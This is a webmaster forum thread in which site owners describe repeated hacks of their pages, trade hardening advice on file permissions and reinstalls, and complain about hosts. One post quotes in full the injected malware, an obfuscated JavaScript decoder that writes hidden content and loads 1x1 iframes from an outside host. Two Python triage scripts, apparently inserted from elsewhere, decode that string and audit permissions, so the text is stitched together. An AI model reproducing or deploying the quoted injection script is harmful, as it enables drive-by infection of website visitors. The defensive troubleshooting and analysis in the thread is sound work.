I keep getting hacked...

  • RevSand
    Confirmed User
    • Oct 2003
    • 8151

    #51
    For those in the know who might have some ideas since I have seen this shit on at least a half dozen sites that are all running diff configs and scripts, here is the coding that seems to get attached to parts of the page..

    <script language="JavaScript">e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF %D5% DC%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80%86%D5 %D8%CC%DD%D1%D9%A2%CF%CC%DF%81%9C%DA%CE%CE%D2%84%9 3%93%DF%D6%C8%DF%D0%CE%90%DF%D3%D1%93%CE%CC%D8%93% 9C%A2%CB%D5%DE%CE%DA%81%8D%A2%DA%D9%D5%DB%DA%CE%81 %8D%80%86%93%D5%D8%CC%DD%D1%D9%80%86%93%DE%D5%C8%8 0";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><iframe src='http://uniqcount.net/adv/066/new.php' width=1 height=1></iframe><iframe src='http://uniqcount.net/adv/new.php?adv=66' width=1 height=1></iframe>
    Or some shit similar...


    BadBitchesGoodWeed


    Hire me for all your video shooting needs!!
    Skype = RevSandx

    Comment
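A static triage sketch for the snippet quoted in this post (an added example, not code from the thread): it decodes the percent-encoded string offline with the constants visible in the quoted script (XOR with 0x3D, then subtract 127) and flags iframes whose width and height are both 0 or 1. `PAGE_PREFIX` is the first 31 bytes of the quoted string with the forum-inserted spaces left in; the sample page, its URLs and all function names are constructed for illustration.

```python
import re

KEY = 0x3D     # from the quoted script: e = '0x00' + '3D'
OFFSET = 127   # from the quoted script: (charCode ^ e) - 127

# A quoted string made only of %XX escapes (whitespace tolerated, since
# forum software often wraps long tokens by inserting spaces).
BLOB_RE = re.compile(r"""["'](%[0-9A-Fa-f%\s]{23,})["']""")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# width/height equal to exactly 0 or 1 (not 10, 100% or 1.5).
TINY_RE = re.compile(r"""\b(width|height)\s*=\s*["']?[01](?![\d.%])""", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def decode_blob(blob, key=KEY, offset=OFFSET):
    """Decode the string without running any of the page's JavaScript."""
    compact = re.sub(r"\s+", "", blob)           # undo inserted spaces
    out = []
    for pair in re.findall(r"%([0-9A-Fa-f]{2})", compact):
        code = (int(pair, 16) ^ key) - offset
        # Triage choice: show anything outside printable ASCII as "?".
        out.append(chr(code) if 32 <= code < 127 else "?")
    return "".join(out)


def scan_page(html):
    """Return (kind, detail) findings for one page's HTML source."""
    findings = []
    for match in BLOB_RE.finditer(html):
        findings.append(("encoded-script", decode_blob(match.group(1))))
    for match in IFRAME_RE.finditer(html):
        tag = match.group(0)
        tiny = {name.lower() for name in TINY_RE.findall(tag)}
        if tiny == {"width", "height"}:
            src = SRC_RE.search(tag)
            findings.append(("hidden-iframe", src.group(1) if src else ""))
    return findings


# First 31 bytes of the string quoted in the post, spaces included.
PAGE_PREFIX = ("%86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF %D5% DC"
               "%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80")

# Constructed sample page: one legitimate embed, one injected block.
SAMPLE = (
    "<html><body><h1>My blog</h1>\n"
    '<iframe src="https://video.example/embed/1" width="640" height="360">'
    "</iframe>\n"
    '<script>str1 = "' + PAGE_PREFIX + '";document.write(str);</script>'
    "<iframe src='http://tracker.example/adv/new.php' width=1 height=1>"
    "</iframe>\n"
    "</body></html>"
)

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE):
        print(kind, "->", detail)
```

Run it over every file under the document root and diff the result against a known-clean copy; a page that gains either finding between deploys is worth pulling from the web server's logs.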

    • FelixFlow
      Confirmed User
      • Nov 2004
      • 2779

      #52
      Originally posted by BusterPorn
      He said he had issues on his page and you clicked the link. He is trying to get it sorted out. If your pc is not protected why click a link when it is typed out that it has issues he is seeking help to fix?


      he said his page was getting hacked

      he didn't fucking say there is a virus on his page that will spread to other users that visit his page



      ICQ: 643 339 687

      Comment

      • LiveDose
        Show Yer Tits!
        • Feb 2002
        • 25792

        #53
        The script kiddies creating this shit should be hunted down and killed.

        Scammer Alert: acer19 acer [email protected] [email protected] Money stolen using PayPal

        Comment

        • cess
          Confirmed User
          • Sep 2006
          • 2921

          #54
          Originally posted by HairToStay
          If you don't know how, ask your host to read Apache logs to see what was compromised and how.

          Then, change hosts to someone who will actually help you.
          Which host would you suggest? I always see people suggesting webair around here.

          Comment

          • RevSand
            Confirmed User
            • Oct 2003
            • 8151

            #55
            Originally posted by cess
            Which host would you suggest? I always see people suggesting webair around here.
            I think this BS is across the board... I have heard of it on at least 3 diff hosts that all have good reputations..


            BadBitchesGoodWeed


            Hire me for all your video shooting needs!!
            Skype = RevSandx

            Comment

            • L0rdJuni0r
              Confirmed User
              • Oct 2004
              • 5883

              #56
              these virus things scare me....
              Affordable video and picture editing.
              junior[at]jampackproductions[DOT]com
              ICQ: 605429331

              Comment

              • RobV
                Confirmed User
                • Oct 2005
                • 111

                #57
                Originally posted by LiveDose
                The script kiddies creating this shit should be hunted down and killed.
                I agree.
                ICQ: 619221

                Comment

                • SinSational
                  Confirmed User
                  • Oct 2004
                  • 1723

                  #58
                  this has happened to a couple customers of ours.

                  the first issue was that the customer had WordPress installed and was using some 3rd party template or counter which was inserting a javascript trojan downloader in to the page on the fly. once the customer removed the template/counter, the issue went away.

                  the second issue was permissions. the customer had some script running with a file owned by apache.apache and 777. once we changed the permissions the javascript trojan went away, and the iframe insertion to uniqcontent went away as well.

                  contact me if you have any other questions.

                  ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
                  Virtual from $14.95/month, Dedicated from $149.95/month
                  Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

                  Comment

                  • RobV
                    Confirmed User
                    • Oct 2005
                    • 111

                    #59
                    Originally posted by SinSational
                    this has happened to a couple customers of ours.

                    the first issue was that the customer had WordPress installed and was using some 3rd party template or counter which was inserting a javascript trojan downloader in to the page on the fly. once the customer removed the template/counter, the issue went away.

                    the second issue was permissions. the customer had some script running with a file owned by apache.apache and 777. once we changed the permissions the javascript trojan went away, and the iframe insertion to uniqcontent went away as well.

                    contact me if you have any other questions.
                    I think I will be contacting you shortly. You wouldn't mind another customer would you?
                    ICQ: 619221

                    Comment

                    • SinSational
                      Confirmed User
                      • Oct 2004
                      • 1723

                      #60
                      Originally posted by RobV
                      I think I will be contacting you shortly. You wouldn't mind another customer would you?
                      of course not.

                      from what you pasted above for the code, it definitely sounds like wrong permissions on some of your files. for wordpress i believe it should be:

                      Folders => 755
                      Files => 644

                      ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
                      Virtual from $14.95/month, Dedicated from $149.95/month
                      Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

                      Comment
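An audit sketch for the permission advice in posts #58 and #60 (an added example, not code from the thread): it walks a document root and reports anything world-writable, anything looser than the 755/644 baseline given above, and, when a UID is supplied, anything the web server account owns and can write. The function names, the `web_uid` parameter and the sample tree are constructed for illustration.

```python
import os
import stat
import tempfile

DIR_MODE = 0o755    # "Folders => 755" from the post
FILE_MODE = 0o644   # "Files => 644" from the post


def audit_tree(root, web_uid=None):
    """Return sorted (relative_path, mode, reason) tuples for risky entries."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        entries = [(dirpath, DIR_MODE)]
        entries += [(os.path.join(dirpath, f), FILE_MODE) for f in filenames]
        for path, expected in entries:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode says nothing; skip it
            mode = stat.S_IMODE(st.st_mode)
            rel = os.path.relpath(path, root)
            shown = "%04o" % mode
            if mode & stat.S_IWOTH:
                findings.append((rel, shown, "world-writable"))
            elif mode & ~expected:
                # Any bit set beyond the baseline; stricter modes pass.
                findings.append((rel, shown, "looser than %04o" % expected))
            if (web_uid is not None and st.st_uid == web_uid
                    and mode & stat.S_IWUSR):
                findings.append((rel, shown, "writable by web server account"))
    return sorted(findings)


def build_sample_tree():
    """Create a small constructed document root to run the audit against."""
    root = tempfile.mkdtemp(prefix="docroot-")
    layout = {
        "index.php": 0o644,      # matches the baseline
        "wp-config.php": 0o600,  # stricter than the baseline: not reported
        "counter.php": 0o777,    # the situation described in post #58
        "theme.css": 0o664,      # group-writable
    }
    for name, mode in layout.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    os.chmod(uploads, 0o777)
    os.chmod(root, 0o755)
    return root


if __name__ == "__main__":
    for rel, mode, reason in audit_tree(build_sample_tree()):
        print(mode, rel, reason)
```

Pass the numeric UID of the account the web server runs as (the `apache` user in post #58) as `web_uid` to list what a compromised script running under that account could rewrite.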

                      • woj
                        <&(©¿©)&>
                        • Jul 2002
                        • 47882

                        #61
                        get a decent host, if everything is tight on the server, your sites shouldn't get owned even with security bugs in any scripts you may use....
                        Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
                        Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
                        Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager

                        Comment

                        • Pipeline Q
                          Confirmed User
                          • Dec 2004
                          • 3891

                          #62
                          bump for this

                          Comment

                          • darksoul
                            Confirmed User
                            • Apr 2002
                            • 4997

                            #63
                            Originally posted by SinSational
                            the second issue was permissions. the customer had some script running with a file owned by apache.apache and 777. once we changed the permissions the javascript trojan went away, and the iframe insertion to uniqcontent went away as well.

                            contact me if you have any other questions.
                            Seriously tho.
                            It doesn't really matter if that file is 777 (some scripts really need that) most php writes that are not run through cgi.
                            The problem is with the script that allows an attacker to execute/upload on your server.
                            1337 5y54|)m1n: 157717888
                            BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
                            Cambooth

                            Comment

                            • en21
                              Confirmed User
                              • May 2006
                              • 2640

                              #64
                              try what we called antivirus
                              Free Asian Sex : http://www.asian4free.com
                              Free Amateur Sex : http://www.lustamateur.com
                              Free Porn : http://www.mysexbookmark.com
                              Free Sex : http://www.goliathlist.com
                              Free Hardcore : http://www.xlust.com
                              Sex For Free : http://www.sexforfee.com

                              Comment

                              • justsexxx
                                Too lazy to set a custom title
                                • Aug 2001
                                • 13723

                                #65
                                Originally posted by RobV
                                My host is webair. I have asked them 10 times with the response of, "It's all your fault, nothing is wrong on our end."
                                Great service
                                Questions?

                                ICQ: 125184542

                                Comment

                                • emthree
                                  Dialer Kingpin
                                  • Jun 2003
                                  • 10816

                                  #66
                                  Wow, that's nasty.
                                  I can't believe webair wasn't more helpful.

                                  • Sell Patches & Pills •

                                  Comment

                                  • Verbal
                                    Confirmed User
                                    • Dec 2001
                                    • 3420

                                    #67
                                    I'm having the same problem and have contacted Webair about it twice now. they are 'looking' into it.

                                    Comment

                                    • DateDoc
                                      Outside looking in.
                                      • Feb 2005
                                      • 14243

                                      #68
                                      Where is webair in this thread to try and help out their customer? They seem to manage to make it to every thread that is looking for hosting but not this one?

                                      Comment

                                      • darksoul
                                        Confirmed User
                                        • Apr 2002
                                        • 4997

                                        #69
                                        Originally posted by FelixFlow
                                        he said his page was getting hacked

                                        he didn't fucking say there is a virus on his page that will spread to other users that visit his page

                                        switch to FF
                                        1337 5y54|)m1n: 157717888
                                        BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
                                        Cambooth

                                        Comment

                                        • Hunter_ST
                                          Confirmed User
                                          • Feb 2003
                                          • 763

                                          #70
                                          keep us posted...

                                          Splosh Cash Wet and Messy Fetish Program
                                          I hate to advocate drugs, alcohol, violence, or insanity to anyone, but they've always worked for me.

                                          Comment

                                          • onlineriches
                                            Confirmed User
                                            • Apr 2006
                                            • 308

                                            #71
                                            Not much you can do about it, looks like the virtual hosting box is compromised and this is likely happening to everyone's pages on the box.

                                            It probably searches for any web content and adds that into every file.

                                            :/

                                            Comment

                                            • The Duck
                                              Adult Content Provider
                                              • May 2005
                                              • 18243

                                              #72
                                              I have the same problem with my sites on webair, trojan javascript at the top of the page just pops out of nowhere...

                                              WEBAIR SOLVE.
                                              Skype Horusmaia
                                              ICQ 41555245
                                              Email [email protected]

                                              Comment

                                              • darksoul
                                                Confirmed User
                                                • Apr 2002
                                                • 4997

                                                #73
                                                oh, this is a virtual server.
                                                That explains it.
                                                1337 5y54|)m1n: 157717888
                                                BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
                                                Cambooth

                                                Comment

                                                • RobV
                                                  Confirmed User
                                                  • Oct 2005
                                                  • 111

                                                  #74
                                                  Originally posted by Verbal
                                                  I'm having the same problem and have contacted Webair about it twice now. they are 'looking' into it.
                                                  Since you got webair to look into it, can you have them look into mine as well. You must communicate better than I.

                                                  Thank You.
                                                  ICQ: 619221

                                                  Comment

                                                  • E$_manager
                                                    Too lazy to set a custom title
                                                    • Apr 2006
                                                    • 13557

                                                    #75
                                                    Ask your hosting.
                                                    Enjoy more sales with EnjoyBucks!
                                                    Homemade: Asian : Ebony : GFs : Voyeur : Nudist : Public : 3D

                                                    Comment

                                                    • DateDoc
                                                      Outside looking in.
                                                      • Feb 2005
                                                      • 14243

                                                      #76
                                                      did u get it fixed?

                                                      Comment

                                                      • SinSational
                                                        Confirmed User
                                                        • Oct 2004
                                                        • 1723

                                                        #77
                                                        Originally posted by BusterPorn
                                                        did u get it fixed?
                                                        yeah, wondering if you got this squared away.

                                                        ICQ# 273099174 - monthly specials - 2 Month Free Credit on All Plans - 100% Referrals - chris@ for details
                                                        Virtual from $14.95/month, Dedicated from $149.95/month
                                                        Dual-Core Xeon > 1000GB @ $149.95 | 1500GB @ $169.95 | 10Mbps @ $269.95

                                                        Comment

                                                        • gooddomains
                                                          Too lazy to set a custom title
                                                          • Jul 2003
                                                          • 10127

                                                          #78
                                                          redo your complete server setup (including OS install) and the problems will go away.

                                                          Comment

                                                          • teomaxxx
                                                            Confirmed User
                                                            • May 2003
                                                            • 2737

                                                            #79
                                                            anyone on webair knows more about it?
                                                            i found some of my domains hosted on webair hacked too (only root index.php files although)...not sure if its coming from my computer or it was some hack of webair accounts.

                                                            Comment

                                                            • RobV
                                                              Confirmed User
                                                              • Oct 2005
                                                              • 111

                                                              #80
                                                              I started a new thread.
                                                              ICQ: 619221

                                                              Comment

                                                              • Gillespie
                                                                Confirmed User
                                                                • Aug 2006
                                                                • 1391

                                                                #81
                                                                Whenever a server has been compromised, it is best to start from scratch. Reinstall the OS, reupload everything, import dbs.

                                                                The attacker might have left stuff on there that you didn't catch. That's why, in most cases, it happens over and over again.

                                                                So my advice is that you format your server, start from scratch and search the web for security information of every single script or software that you plan to put on there.
                                                                Blue Design Studios
                                                                My choice for web design.
                                                                Click this to see why.


                                                                Get a REAL host. Try JaguarPC.

                                                                294-659-259

                                                                Comment

                                                                • Violetta
                                                                  Affiliate
                                                                  • Jul 2004
                                                                  • 28735

                                                                  #82
                                                                  this shit sucks... I'm working on the wordpress chmod now! Also installing the latest version.
                                                                  M&A Queen

                                                                  Comment

                                                                  • emthree
                                                                    Dialer Kingpin
                                                                    • Jun 2003
                                                                    • 10816

                                                                    #83
                                                                    Originally posted by Rockatansky
                                                                    this shit sucks... I'm working on the wordpress chmod now! Also installing the latest version.
                                                                    I have the latest WP version, and still the same shit.

                                                                    • Sell Patches & Pills •

                                                                    Comment

                                                                    • emthree
                                                                      Dialer Kingpin
                                                                      • Jun 2003
                                                                      • 10816

                                                                      #84
                                                                      RobV what is the status on your situation?

                                                                      • Sell Patches & Pills •

                                                                      Comment

                                                                      • JD
                                                                        Too lazy to set a custom title
                                                                        • Sep 2003
                                                                        • 22651

                                                                        #85
                                                                        buuuuump just got hit AGAIN today

                                                                        Comment

                                                                        • RobV
                                                                          Confirmed User
                                                                          • Oct 2005
                                                                          • 111

                                                                          #86
                                                                          Originally posted by emthree
                                                                          RobV what is the status on your situation?
                                                                          Webair changed my password (however my original password was VERY strong). Since the second password change I have not been hacked.
                                                                          And oddly enough this only hit 1 blog I had on the server, everything else was untouched.
                                                                          ICQ: 619221

                                                                          Comment

                                                                          • cosis
                                                                            Confirmed User
                                                                            • Aug 2001
                                                                            • 5292

                                                                            #87
                                                                            Originally posted by RobV
                                                                            My host is webair. I have asked them 10 times with the response of, "It's all your fault, nothing is wrong on our end."
                                                                            same thing happened to me, my host was CANDID HOSTING though, got the same reply from them......... So I said fuck you and switched hosts. Haven't had any problems since.
                                                                            Last edited by cosis; 11-20-2006, 09:03 AM.

                                                                            Comment

                                                                            • Ange
                                                                              Registered User
                                                                              • Jan 2006
                                                                              • 44

                                                                              #88
                                                                              trojan alert!!!!!!

                                                                              Comment

                                                                              • Big_Red
                                                                                Confirmed User
                                                                                • Jun 2006
                                                                                • 4147

                                                                                #89
                                                                                Originally posted by RobV
                                                                                Yeah I am reading about that, the only thing that gets me is I have Norton Internet Security (and virus scanner) and I have the most up to date definitions and it's not pulling anything on the system (yet I do still think it's on my comp). Any ideas?

                                                                                Secondly I have asked webair for help, honestly about 5 times with the same reply of "nothing we can do, it's all on you, make sure your wordpress is up to date."
                                                                                yeh, first ditch Norton and get a real Antivirus.
                                                                                60% Revshare.
                                                                                http://www.boobycash.com We got the boobs and the cash!
                                                                                ICQ 198-580-197 24/7 support

                                                                                Comment
